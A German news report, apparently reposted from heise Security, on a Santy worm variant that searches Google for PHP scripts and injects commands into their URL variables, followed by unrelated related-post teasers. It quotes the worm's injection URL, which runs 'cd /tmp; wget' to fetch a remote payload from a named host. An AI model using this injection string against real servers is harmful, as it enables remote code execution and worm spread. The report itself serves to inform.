Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Sage Danke!
Du findest den Beitrag gut und möchtest Dich beim Autor bedanken? Schicke ihm einen Betrag Deiner Wahl.
Danke sagen!
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
<b><BR>Happy Birthday, E-Mail!</b>
Im Herbst 1971 schreibt Ray Tomlinson, Programmierer bei Bolt, Beranek and Newman (BBN), Technik-Geschichte, indem er zwei Systeme miteinander kombiniert: ein bereits existierendes Programm für den Transfer von Nachrichten zwischen Benutzern desselben Com ...
Autor :
admin
Kategorie:
Software & Web-Development
Gravierende Bugs in Windows XP: Datenverlust und heiße CPUs sind die Folge
Nun wurden zwei Bugs in Windows XP gefunden, die für den Benutzer des Betriebssystems sehr gefährlich sein können. Einer der Bugs nennt sich 'Datenverlust-Bug' und sorgt dafür, dass viele wichtige Daten gelöscht werden können. Um den Fehler zu behebe ...
Autor :
admin
Kategorie:
Software & Web-Development
.NET für Linux und Unix
Ximian kündigte jetzt unter dem Namen "Mono Project" eine Linux-basierte Open-Source-Implementation von Microsofts .NET-Entwicklungsplattform an. Das Mono Project soll .NET-kompatible Komponenten wie einen C# Compiler, einen Common Language Runtime JIT-Co ...
Autor :
admin
Kategorie:
Software & Web-Development
IT-Entscheider glauben an Trendwende
Fast 70 Prozent der deutschen IT-Entscheider sind der Meinung, dass sich die Computermesse in Hannover positiv auf die wirtschaftliche Entwicklung in Deutschland auswirken wird. Mehr als 60 Prozent glauben fest daran, dass die Konjunktur in Deutschl ...
Autor :
admin
Kategorie:
Software & Web-Development
Magento - Was erwartet uns mit Magento 2?
Es scheint die Roadmap zur Veröffentlichung der neuen, von der Magento Gemeinde heiß ersehnten Magento Version 2 zu stehen. Welche Neuerungen Magento User und Entwickler mit der Version 2.0 erwarten können, haben wir für Euch hier kurz zusammengefasst. ...
Autor :
admin
Kategorie:
Software & Web-Development
PHP Referenz - Befehlskarte
"Wie lautet die genau Syntax des Befehls nochmal?" Die PHP Referenz - Befehlskarte von terrashop.de hilft bei der täglichen Programmierarbeit. ...
Autor :
admin
Kategorie:
Dies und Das
